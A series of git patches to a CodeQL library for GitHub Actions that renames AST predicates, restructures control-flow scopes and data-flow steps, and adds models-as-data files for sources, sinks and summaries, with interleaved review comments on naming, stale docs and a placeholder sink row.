taint from $@.", source.getNode(), + "this source" From 9c6fd20e5e6a9b96423c1f3b0cabaf722ff0908f Mon Sep 17 00:00:00 2001 
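Review bot: `partial.ql` is a flow-exploration aid, yet its header gives it `@kind path-problem`, `@problem.severity error` and the id `actions/test-dataflow`, and nothing in it says it is not a detection. Its `isSource` is pinned to the base name `calling_workflow.yml` and `isSink` is `none()`, so it only explores forward from that one fixture. If `ql/src` is the published query pack (not visible here), it would still be compiled and listed alongside the real queries. A description such as `@description Debugging aid: explores partial forward flow from sources in calling_workflow.yml; not a security query` would make the intent clear. The commented-out `//predicate isSink(DataFlow::Node sink) { any() }` added to ExpressionInjection.ql in the preceding hunk is the same kind of debugging residue and is better left out of the security query.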
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Feb 2024 12:29:48 +0100 Subject: [PATCH 0016/1267] Move reusable tests to src pack --- ql/{lib => src}/test/.github/workflows/calling_workflow.yml | 0 ql/{lib => src}/test/.github/workflows/reusable_workflow.yml | 0 2 files changed, 0 insertions(+), 0 deletions(-) rename ql/{lib => src}/test/.github/workflows/calling_workflow.yml (100%) rename ql/{lib => src}/test/.github/workflows/reusable_workflow.yml (100%) diff --git a/ql/lib/test/.github/workflows/calling_workflow.yml b/ql/src/test/.github/workflows/calling_workflow.yml similarity index 100% rename from ql/lib/test/.github/workflows/calling_workflow.yml rename to ql/src/test/.github/workflows/calling_workflow.yml diff --git a/ql/lib/test/.github/workflows/reusable_workflow.yml b/ql/src/test/.github/workflows/reusable_workflow.yml similarity index 100% rename from ql/lib/test/.github/workflows/reusable_workflow.yml rename to ql/src/test/.github/workflows/reusable_workflow.yml From b54316fc9ab101bcb6a2e11ac57a888c681cc477 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Feb 2024 13:35:47 +0100 Subject: [PATCH 0017/1267] Refactor CfgScopes and Ast predicate names --- ql/lib/codeql/actions/Ast.qll | 53 +++++++------- .../actions/controlflow/internal/Cfg.qll | 70 +++++++++++-------- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +- .../dataflow/internal/DataFlowPrivate.qll | 45 ++++-------- .../dataflow/internal/DataFlowPublic.qll | 18 ++--- .../Security/CWE-094/ExpressionInjection.ql | 2 - 6 files changed, 94 insertions(+), 96 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index b84f884c034..a25ef856233 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -31,11 +31,9 @@ class Expression extends Statement { } * A Github Actions Workflow */ class WorkflowStmt extends Statement instanceof Actions::Workflow { - JobStmt getAJob() { result = super.getJob(_) } + JobStmt getAJobStmt() { result = super.getJob(_) } - JobStmt getJob(string id) { result = super.getJob(id) } - - predicate isReusable() { this instanceof ReusableWorkflowStmt } + JobStmt getJobStmt(string id) { result = super.getJob(id) } } class ReusableWorkflowStmt extends WorkflowStmt { @@ -45,15 +43,19 @@ class ReusableWorkflowStmt extends WorkflowStmt { this.(Actions::Workflow).getOn().getNode("workflow_call") = workflow_call } - InputsStmt getInputs() { result = workflow_call.(YamlMapping).lookup("inputs") } + ReusableWorkflowInputsStmt getInputsStmt() { + result = workflow_call.(YamlMapping).lookup("inputs") + } - OutputsStmt getOutputs() { result = workflow_call.(YamlMapping).lookup("outputs") } + ReusableWorkflowOutputsStmt getOutputsStmt() { + result = workflow_call.(YamlMapping).lookup("outputs") + } string getName() { result = this.getLocation().getFile().getRelativePath() } } -class InputsStmt extends Statement instanceof YamlMapping { - InputsStmt() { +class ReusableWorkflowInputsStmt extends Statement instanceof YamlMapping { + ReusableWorkflowInputsStmt() { exists(Actions::On on | on.getNode("workflow_call").(YamlMapping).lookup("inputs") = this) } 
@@ -70,16 +72,16 @@ class InputsStmt extends Statement instanceof YamlMapping { * token: * required: true */ - InputExpr getInputExpr(string name) { + ReusableWorkflowInputExpr getInputExpr(string name) { result.(YamlString).getValue() = name and this.(YamlMapping).maps(result, _) } } -class InputExpr extends Expression instanceof YamlString { } +class ReusableWorkflowInputExpr extends Expression instanceof YamlString { } -class OutputsStmt extends Statement instanceof YamlMapping { - OutputsStmt() { +class ReusableWorkflowOutputsStmt extends Statement instanceof YamlMapping { + ReusableWorkflowOutputsStmt() { exists(Actions::On on | on.getNode("workflow_call").(YamlMapping).lookup("outputs") = this) } @@ -96,12 +98,12 @@ class OutputsStmt extends Statement instanceof YamlMapping { * description: "The second output string" * value: ${{ jobs.example_job.outputs.output2 }} */ - OutputExpr getOutputExpr(string name) { + ReusableWorkflowOutputExpr getOutputExpr(string name) { this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result } } -class OutputExpr extends Expression instanceof YamlString { } +class ReusableWorkflowOutputExpr extends Expression instanceof YamlString { } /** * A Job is a collection of steps that run in an execution environment. @@ -114,10 +116,10 @@ class JobStmt extends Statement instanceof Actions::Job { string getId() { result = super.getId() } /** Gets the step at the given index within this job. */ - StepStmt getStep(int index) { result = super.getStep(index) } + StepStmt getStepStmt(int index) { result = super.getStep(index) } /** Gets any steps that are defined within this job. */ - StepStmt getAStep() { result = super.getStep(_) } + StepStmt getAStepStmt() { result = super.getStep(_) } /** * Gets a needed job. 
@@ -147,7 +149,7 @@ class JobStmt extends Statement instanceof Actions::Job { * with: * arg1: value1 */ - JobUsesExpr getUsesExpr() { result.getJob() = this } + JobUsesExpr getUsesExpr() { result.getJobStmt() = this } } /** @@ -178,7 +180,7 @@ class JobOutputStmt extends Statement instanceof YamlMapping { class StepStmt extends Statement instanceof Actions::Step { string getId() { result = super.getId() } - JobStmt getJob() { result = super.getJob() } + JobStmt getJobStmt() { result = super.getJob() } } /** @@ -189,7 +191,7 @@ abstract class UsesExpr extends Expression { abstract string getVersion(); - abstract Expression getArgument(string key); + abstract Expression getArgumentExpr(string key); } /** @@ -204,7 +206,7 @@ class StepUsesExpr extends StepStmt, UsesExpr { override string getVersion() { result = uses.getVersion() } - override Expression getArgument(string key) { + override Expression getArgumentExpr(string key) { exists(Actions::With with | with.getStep() = this and result = with.lookup(key) @@ -220,7 +222,7 @@ class JobUsesExpr extends UsesExpr instanceof YamlMapping { this instanceof JobStmt and this.maps(any(YamlString s | s.getValue() = "uses"), _) } - JobStmt getJob() { result = this } + JobStmt getJobStmt() { result = this } /** * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. @@ -255,7 +257,7 @@ class JobUsesExpr extends UsesExpr instanceof YamlMapping { ) } - override Expression getArgument(string key) { + override Expression getArgumentExpr(string key) { this.(YamlMapping).lookup("with").(YamlMapping).lookup(key) = result } } @@ -290,8 +292,7 @@ class ExprAccessExpr extends Expression instanceof YamlString { string getExpression() { result = expr } - JobStmt getJob() { result.getAChildNode*() = this } - //override string toString() { result = expr } + JobStmt getJobStmt() { result.getAChildNode*() = this } } /** 
@@ -313,7 +314,7 @@ class StepOutputAccessExpr extends ExprAccessExpr { string getVarName() { result = varName } - StepStmt getStep() { result.getId() = stepId } + StepStmt getStepStmt() { result.getId() = stepId } } /** @@ -368,7 +369,7 @@ class ReusableWorkflowInputAccessExpr extends ExprAccessExpr { Expression getInputExpr() { exists(ReusableWorkflowStmt w | w.getLocation().getFile() = this.getLocation().getFile() and - w.getInputs().getInputExpr(paramName) = result + w.getInputsStmt().getInputExpr(paramName) = result ) } } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 057d7872ee3..9129ee5dc61 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -87,9 +87,7 @@ module Completion { module CfgScope { abstract class CfgScope extends AstNode { } - class ReusableWorkflowScope extends CfgScope instanceof ReusableWorkflowStmt { } - - class JobScope extends CfgScope instanceof JobStmt { } + class WorkflowScope extends CfgScope instanceof WorkflowStmt { } } private module Implementation implements CfgShared::InputSig { @@ -122,15 +120,9 @@ private module Implementation implements CfgShared::InputSig { int maxSplits() { result = 0 } - predicate scopeFirst(CfgScope scope, AstNode e) { - first(scope.(ReusableWorkflowStmt).getInputs(), e) or - first(scope.(JobStmt), e) - } + predicate scopeFirst(CfgScope scope, AstNode e) { first(scope.(WorkflowStmt), e) } - predicate scopeLast(CfgScope scope, AstNode e, Completion c) { - last(scope.(ReusableWorkflowStmt), e, c) or - last(scope.(JobStmt), e, c) - } + predicate scopeLast(CfgScope scope, AstNode e, Completion c) { last(scope.(WorkflowStmt), e, c) } predicate successorTypeIsSimple(SuccessorType t) { t instanceof NormalSuccessor } 
@@ -147,21 +139,38 @@ private import CfgImpl private import Completion private import CfgScope -private class ReusableWorkflowTree extends StandardPreOrderTree instanceof ReusableWorkflowStmt { +private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt { override ControlFlowTree getChildNode(int i) { - result = - rank[i](Expression child, Location l | - (child = super.getInputs() or child = super.getOutputs()) and - l = child.getLocation() - | - child - order by - l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() - ) + if this instanceof ReusableWorkflowStmt + then + result = + rank[i](Expression child, Location l | + ( + child = this.(ReusableWorkflowStmt).getInputsStmt() or + child = this.(ReusableWorkflowStmt).getOutputsStmt() or + child = this.(ReusableWorkflowStmt).getAJobStmt() + ) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + else + result = + rank[i](Expression child, Location l | + child = super.getAJobStmt() and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) } } -private class ReusableWorkflowInputsTree extends StandardPreOrderTree instanceof InputsStmt { +private class ReusableWorkflowInputsTree extends StandardPreOrderTree instanceof ReusableWorkflowInputsStmt +{ override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | 
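Review bot: The two branches of the `if this instanceof ReusableWorkflowStmt` in `WorkflowTree.getChildNode` repeat the same `rank` expression and ordering, and differ only in the set of children. The casts `this.(ReusableWorkflowStmt)` have no result for a plain workflow, so a single `rank` over the three disjuncts gives the same children in both cases and keeps the ordering in one place. The rest of the class is unchanged.

```ql
  override ControlFlowTree getChildNode(int i) {
    result =
      rank[i](Expression child, Location l |
        (
          child = this.(ReusableWorkflowStmt).getInputsStmt() or
          child = this.(ReusableWorkflowStmt).getOutputsStmt() or
          child = super.getAJobStmt()
        ) and
        l = child.getLocation()
      |
        child
        order by
          l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString()
      )
  }
```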
@@ -174,9 +183,10 @@ private class ReusableWorkflowInputsTree extends StandardPreOrderTree instanceof } } -private class InputExprTree extends LeafTree instanceof InputExpr { } +private class InputExprTree extends LeafTree instanceof ReusableWorkflowInputExpr { } -private class ReusableWorkflowOutputsTree extends StandardPreOrderTree instanceof OutputsStmt { +private class ReusableWorkflowOutputsTree extends StandardPreOrderTree instanceof ReusableWorkflowOutputsStmt +{ override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | @@ -189,13 +199,17 @@ private class ReusableWorkflowOutputsTree extends StandardPreOrderTree instanceo } } -private class OutputExprTree extends LeafTree instanceof OutputExpr { } +private class OutputExprTree extends LeafTree instanceof ReusableWorkflowOutputExpr { } private class JobTree extends StandardPreOrderTree instanceof JobStmt { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | - (child = super.getAStep() or child = super.getOutputStmt() or child = super.getUsesExpr()) and + ( + child = super.getAStepStmt() or + child = super.getOutputStmt() or + child = super.getUsesExpr() + ) and l = child.getLocation() | child @@ -213,7 +227,7 @@ private class StepUsesTree extends StandardPreOrderTree instanceof StepUsesExpr override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | - child = super.getArgument(_) and l = child.getLocation() + child = super.getArgumentExpr(_) and l = child.getLocation() | child order by @@ -226,7 +240,7 @@ private class JobUsesTree extends StandardPreOrderTree instanceof JobUsesExpr { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | - child = super.getArgument(_) and l = child.getLocation() + child = super.getArgumentExpr(_) and l = child.getLocation() | child order by 
diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index ead312d8af6..84019aa2727 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -27,7 +27,7 @@ private class ActionsFindAndReplaceStringStep extends AdditionalTaintStep { override predicate step(DataFlow::Node pred, DataFlow::Node succ) { exists(UsesExpr u | u.getCallee() = "mad9000/actions-find-and-replace-string" and - pred.asExpr() = u.getArgument(["source", "replace"]) and + pred.asExpr() = u.getArgumentExpr(["source", "replace"]) and succ.asExpr() = u ) } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 02b7de847e3..76495e3f80c 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -20,14 +20,14 @@ class OutNode extends ExprNode { } /** - * Not used + * Not implemented */ class CastNode extends Node { CastNode() { none() } } /** - * Not used + * Not implemented */ class PostUpdateNode extends Node { PostUpdateNode() { none() } @@ -45,8 +45,6 @@ predicate isArgumentNode(ArgumentNode arg, DataFlowCall call, ArgumentPosition p DataFlowCallable nodeGetEnclosingCallable(Node node) { node = TExprNode(any(DataFlowExpr e | result = e.getScope())) - // node = TReturningNode(any(Cfg::Node n | result = n.getScope())) - // node = TParameterNode(any(InputExpr p | p = result.(ReusableWorkflowStmt).getInputs().getInputExpr(_))) } DataFlowType getNodeType(Node node) { any() } @@ -84,10 +82,7 @@ class DataFlowCallable instanceof Cfg::CfgScope { string getName() { if this instanceof ReusableWorkflowStmt then result = this.(ReusableWorkflowStmt).getName() - else - if this instanceof JobStmt - then result = this.(JobStmt).getId() - else none() + else none() } } 
@@ -105,16 +100,6 @@ class NormalReturn extends ReturnKind, TNormalReturn { /** Gets a viable implementation of the target of the given `Call`. */ DataFlowCallable viableCallable(DataFlowCall c) { c.getName() = result.getName() } -// /** -// * Holds if the set of viable implementations that can be called by `call` -// * might be improved by knowing the call context. -// */ -// predicate mayBenefitFromCallContext(DataFlowCall call, DataFlowCallable c) { none() } -// /** -// * Gets a viable dispatch target of `call` in the context `ctx`. This is -// * restricted to those `call`s for which a context might make a difference. -// */ -// DataFlowCallable viableImplInCallContext(DataFlowCall call, DataFlowCall ctx) { none() } /** * Gets a node that can read the value returned from `call` with return kind * `kind`. @@ -162,17 +147,17 @@ class ContentApprox extends TContentApprox { ContentApprox getContentApprox(Content c) { none() } /** - * Made a string to match the ArgumentPosition type + * Made a string to match the ArgumentPosition type. */ class ParameterPosition extends string { - ParameterPosition() { exists(any(ReusableWorkflowStmt w).getInputs().getInputExpr(this)) } + ParameterPosition() { exists(any(ReusableWorkflowStmt w).getInputsStmt().getInputExpr(this)) } } /** * Made a string to match `With:` keys in the AST */ class ArgumentPosition extends string { - ArgumentPosition() { exists(any(UsesExpr e).getArgument(this)) } + ArgumentPosition() { exists(any(UsesExpr e).getArgumentExpr(this)) } } /** @@ -185,7 +170,7 @@ predicate stepUsesOutputDefToUse(Node nodeFrom, Node nodeTo) { uses = nodeFrom.asExpr() and outputRead = nodeTo.asExpr() and outputRead.getStepId() = uses.getId() and - uses.getJob() = outputRead.getJob() + uses.getJobStmt() = outputRead.getJobStmt() ) } 
@@ -195,7 +180,7 @@ predicate runOutputDefToUse(Node nodeFrom, Node nodeTo) { uses = nodeFrom.asExpr() and outputRead = nodeTo.asExpr() and outputRead.getStepId() = uses.getId() and - uses.getJob() = outputRead.getJob() + uses.getJobStmt() = outputRead.getJobStmt() ) } @@ -223,7 +208,12 @@ predicate reusableWorkflowInputDefToUse(Node nodeFrom, Node nodeTo) { * Local flow steps are always between two nodes in the same Cfg scope (job definition). */ pragma[nomagic] -predicate localFlowStep(Node nodeFrom, Node nodeTo) { none() } +predicate localFlowStep(Node nodeFrom, Node nodeTo) { + stepUsesOutputDefToUse(nodeFrom, nodeTo) or + runOutputDefToUse(nodeFrom, nodeTo) or + jobOutputDefToUse(nodeFrom, nodeTo) or + reusableWorkflowInputDefToUse(nodeFrom, nodeTo) +} /** * a simple local flow step that should always preserve the call context (same callable) @@ -238,12 +228,7 @@ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFr * AKA teleport steps * local steps are preferible since they are more predictable and easier to control */ -predicate jumpStep(Node nodeFrom, Node nodeTo) { - stepUsesOutputDefToUse(nodeFrom, nodeTo) or - runOutputDefToUse(nodeFrom, nodeTo) or - jobOutputDefToUse(nodeFrom, nodeTo) or - reusableWorkflowInputDefToUse(nodeFrom, nodeTo) -} +predicate jumpStep(Node nodeFrom, Node nodeTo) { none() } /** * Holds if data can flow from `node1` to `node2` via a read of `c`. Thus, diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 80f504963b9..a14b0693874 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -27,7 +27,7 @@ class Node extends TNode { } /** - * Any Ast Expression + * Any Ast Expression. * UsesExpr, RunExpr, ArgumentExpr, VarAccessExpr, ... */ class ExprNode extends Node, TExprNode { 
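Review bot: The doc comment above `localFlowStep` still says local steps stay "in the same Cfg scope (job definition)", but this commit makes the workflow the only `CfgScope` (`WorkflowScope` in Cfg.qll) and moves all four `...DefToUse` predicates from `jumpStep` into `localFlowStep`. The comment should read `* Local flow steps are always between two nodes in the same Cfg scope (workflow).` Local steps must not leave the enclosing callable, so it is worth confirming that `jobOutputDefToUse` (its body is outside this hunk) only relates nodes of the same workflow file, as `reusableWorkflowInputDefToUse` does via its file equality check; a step that crosses files would belong in `jumpStep`.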
@@ -48,34 +48,34 @@ class ExprNode extends Node, TExprNode { * Reusable workflow input nodes */ class ParameterNode extends ExprNode { - private InputExpr parameter; + private ReusableWorkflowInputExpr parameter; ParameterNode() { this.asExpr() = parameter and - parameter = any(ReusableWorkflowStmt w).getInputs().getInputExpr(_) + parameter = any(ReusableWorkflowStmt w).getInputsStmt().getInputExpr(_) } predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { - parameter = c.(ReusableWorkflowStmt).getInputs().getInputExpr(pos) + parameter = c.(ReusableWorkflowStmt).getInputsStmt().getInputExpr(pos) } override string toString() { result = parameter.toString() } override Location getLocation() { result = parameter.getLocation() } - InputExpr getInputExpr() { result = parameter } + ReusableWorkflowInputExpr getInputExpr() { result = parameter } } /** - * An argument to a Uses step (call) + * An argument to a Uses step (call). */ class ArgumentNode extends ExprNode { - ArgumentNode() { this.getCfgNode().getAstNode() = any(UsesExpr e).getArgument(_) } + ArgumentNode() { this.getCfgNode().getAstNode() = any(UsesExpr e).getArgumentExpr(_) } predicate argumentOf(DataFlowCall call, ArgumentPosition pos) { this.getCfgNode() = call.(Cfg::Node).getASuccessor+() and call.(Cfg::Node).getAstNode() = - any(UsesExpr e | e.getArgument(pos) = this.getCfgNode().getAstNode()) + any(UsesExpr e | e.getArgumentExpr(pos) = this.getCfgNode().getAstNode()) } } @@ -87,7 +87,7 @@ class ReturnNode extends ExprNode { ReturnNode() { this.getCfgNode() = node and - node.getAstNode() = any(ReusableWorkflowStmt w).getOutputs().getOutputExpr(_) + node.getAstNode() = any(ReusableWorkflowStmt w).getOutputsStmt().getOutputExpr(_) } ReturnKind getKind() { result = TNormalReturn() } diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 2fe6f17dfb6..f8d6e0c804b 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql 
+++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -24,8 +24,6 @@ private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } - //predicate isSink(DataFlow::Node sink) { any() } - //predicate neverSkip(DataFlow::Node node) { any() } } module MyFlow = TaintTracking::Global; From 2eaca7e826c8f990d999696990e1e6a2d43c9992 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Feb 2024 22:49:54 +0100 Subject: [PATCH 0018/1267] Add support for external definitions --- .../codeql/actions/dataflow/ExternalFlow.qll | 31 ++++++++++++++++++ .../codeql/actions/dataflow/FlowSources.qll | 23 +++++++++---- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 32 ++++++++++++------- .../internal/ExternalFlowExtensions.qll | 20 ++++++++++++ ql/lib/ext/sinks.model.yml | 11 +++++++ ql/lib/ext/sources.model.yml | 11 +++++++ ql/lib/ext/summaries.model.yml | 19 +++++++++++ ql/lib/qlpack.yml | 8 +++-- ql/lib/test/test.ql | 13 ++++++-- .../Security/CWE-094/ExpressionInjection.ql | 6 +++- 10 files changed, 150 insertions(+), 24 deletions(-) create mode 100644 ql/lib/codeql/actions/dataflow/ExternalFlow.qll create mode 100644 ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll create mode 100644 ql/lib/ext/sinks.model.yml create mode 100644 ql/lib/ext/sources.model.yml create mode 100644 ql/lib/ext/summaries.model.yml diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll new file mode 100644 index 00000000000..6e02e4036ba --- /dev/null +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll 
@@ -0,0 +1,31 @@ +private import internal.ExternalFlowExtensions as Extensions +import codeql.actions.DataFlow +import actions + +/** Holds if a source model exists for the given parameters. */ +predicate sourceModel(string action, string version, string output, string kind) { + Extensions::sourceModel(action, version, output, kind) +} + +/** Holds if a sink model exists for the given parameters. */ +predicate summaryModel(string action, string version, string input, string output, string kind) { + Extensions::summaryModel(action, version, input, output, kind) +} + +/** Holds if a sink model exists for the given parameters. */ +predicate sinkModel(string action, string version, string input, string kind) { + Extensions::sinkModel(action, version, input, kind) +} + +predicate sinkNode(DataFlow::ExprNode sink, string kind) { + exists(UsesExpr uses, string action, string version, string input | + uses.getArgumentExpr(input.splitAt(",").trim()) = sink.asExpr() and + sinkModel(action, version, input, kind) and + uses.getCallee() = action and + ( + if version.trim() = "*" + then uses.getVersion() = any(string v) + else uses.getVersion() = version.splitAt(",").trim() + ) + ) +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 3e6a6141767..3bde829321f 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -1,5 +1,6 @@ import actions import codeql.actions.DataFlow +import codeql.actions.dataflow.ExternalFlow /** * A data flow source. 
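Review bot: The QLDoc on `summaryModel` in the new `ExternalFlow.qll` is a copy of the one on `sinkModel`; it should read `/** Holds if a summary model exists for the given parameters. */`. `sinkNode` has no QLDoc at all, although it is the predicate that defines how a model row is matched: `action` by equality with `getCallee()`, `version` as `*` or a comma-separated list, `input` as a comma-separated list of `with:` keys. A short comment stating those three rules would let authors of `*.model.yml` rows know what will and will not match. Note also that the `*` branch still requires `uses.getVersion()` to have a value, so a `uses` without a version would presumably not match; verify against the `getVersion` implementations.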
@@ -124,14 +125,22 @@ private class EventSource extends RemoteFlowSource { override string getSourceType() { result = "User-controlled events" } } -private class ChangedFilesSource extends RemoteFlowSource { - ChangedFilesSource() { - exists(UsesExpr uses | - uses.getCallee() = "tj-actions/changed-files" and - uses.getVersion() = ["v10", "v20", "v30", "v40"] and - uses = this.asExpr() +private class ExternallyDefinedSource extends RemoteFlowSource { + string soutceType; + + ExternallyDefinedSource() { + exists(UsesExpr uses, string action, string version, /*string output,*/ string kind | + sourceModel(action, version, _, kind) and + uses.getCallee() = action and + ( + if version.trim() = "*" + then uses.getVersion() = any(string v) + else uses.getVersion() = version.splitAt(",").trim() + ) and + uses = this.asExpr() and + soutceType = kind ) } - override string getSourceType() { result = "User-controlled list of changed files" } + override string getSourceType() { result = soutceType } } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 84019aa2727..e5fa04427cc 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -5,6 +5,7 @@ import actions private import codeql.util.Unit private import codeql.actions.DataFlow +import codeql.actions.dataflow.ExternalFlow /** * A unit class for adding additional taint steps. 
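Review bot: `ExternallyDefinedSource` ignores the `output` column of the model: the call is `sourceModel(action, version, _, kind)` with `/*string output,*/` left commented out, and the source is the whole `uses` expression. Every output of a modelled action is therefore treated as remote input, whatever the row names. `externallyDefinedSummary` in the FlowSteps.qll hunk of this commit does the same with `summaryModel(action, version, input, _, "taint")`. Until the column is used, I would say so next to both calls, e.g. `// NOTE: the model's output column is not used yet; the whole uses step is the source.`, and drop the commented-out parameter. The field name `soutceType` is a typo for `sourceType`.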
@@ -20,16 +21,23 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } -/** - * Holds if actions-find-and-replace-string step is used. - */ -private class ActionsFindAndReplaceStringStep extends AdditionalTaintStep { +predicate externallyDefinedSummary(DataFlow::Node pred, DataFlow::Node succ) { + exists(UsesExpr uses, string action, string version, string input | + /*, string output */ summaryModel(action, version, input, _, "taint") and + uses.getCallee() = action and + ( + if version.trim() = "*" + then uses.getVersion() = any(string v) + else uses.getVersion() = version.splitAt(",").trim() + ) and + pred.asExpr() = uses.getArgumentExpr(input.splitAt(",").trim()) and + succ.asExpr() = uses + ) +} + +private class ExternallyDefinedSummary extends AdditionalTaintStep { override predicate step(DataFlow::Node pred, DataFlow::Node succ) { - exists(UsesExpr u | - u.getCallee() = "mad9000/actions-find-and-replace-string" and - pred.asExpr() = u.getArgumentExpr(["source", "replace"]) and - succ.asExpr() = u - ) + externallyDefinedSummary(pred, succ) } } @@ -46,10 +54,12 @@ private class ActionsFindAndReplaceStringStep extends AdditionalTaintStep { * echo "::set-output name=initial_url::$INITIAL_URL" */ private class RunEnvToScriptStep extends AdditionalTaintStep { - override predicate step(DataFlow::Node pred, DataFlow::Node succ) { test(pred, succ) } + override predicate step(DataFlow::Node pred, DataFlow::Node succ) { + runEnvToScriptstep(pred, succ) + } } -predicate test(DataFlow::Node pred, DataFlow::Node succ) { +predicate runEnvToScriptstep(DataFlow::Node pred, DataFlow::Node succ) { exists(RunExpr r, string varName | r.getEnvExpr(varName) = pred.asExpr() and exists(string script, string line | diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll new file mode 100644 index 00000000000..89cf4de0261 
--- /dev/null +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -0,0 +1,20 @@ +/** + * This module provides extensible predicates for defining MaD models. + */ + +/** + * Holds if a source model exists for the given parameters. + */ +extensible predicate sourceModel(string action, string version, string output, string kind); + +/** + * Holds if a summary model exists for the given parameters. + */ +extensible predicate summaryModel( + string action, string version, string input, string output, string kind +); + +/** + * Holds if a sink model exists for the given parameters. + */ +extensible predicate sinkModel(string action, string version, string input, string kind); diff --git a/ql/lib/ext/sinks.model.yml b/ql/lib/ext/sinks.model.yml new file mode 100644 index 00000000000..e28ec39d1be --- /dev/null +++ b/ql/lib/ext/sinks.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sinkModel + data: + - [ + "FAKE-mad9000/actions-find-and-replace-string", + "*", + "source", + "expression-injection", + ] diff --git a/ql/lib/ext/sources.model.yml b/ql/lib/ext/sources.model.yml new file mode 100644 index 00000000000..666a5532865 --- /dev/null +++ b/ql/lib/ext/sources.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sourceModel + data: + - [ + "tj-actions/changed-files", + "v10, v20, v30, v40", + "all_changed_file", + "PR", + ] diff --git a/ql/lib/ext/summaries.model.yml b/ql/lib/ext/summaries.model.yml new file mode 100644 index 00000000000..cc8e2df5fe9 --- /dev/null +++ b/ql/lib/ext/summaries.model.yml @@ -0,0 +1,19 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - [ + "mad9000/actions-find-and-replace-string", + "*", + "source, replace", + "value", + "taint", + ] + - [ + "frabert/replace-string-action", + "*", + "string, replace-with", + "replaced", + "taint", + ] 
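Review bot: The only row in `ql/lib/ext/sinks.model.yml` is `"FAKE-mad9000/actions-find-and-replace-string"`, which looks like a fixture for exercising `sinkModel` rather than a real action. The qlpack.yml change in this commit loads `ext/*.model.yml` as `dataExtensions`, so this row ships as part of the library's model data. I would either move it next to the tests or mark it in the file, e.g. `# placeholder row used to exercise sinkModel; not a real action`.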
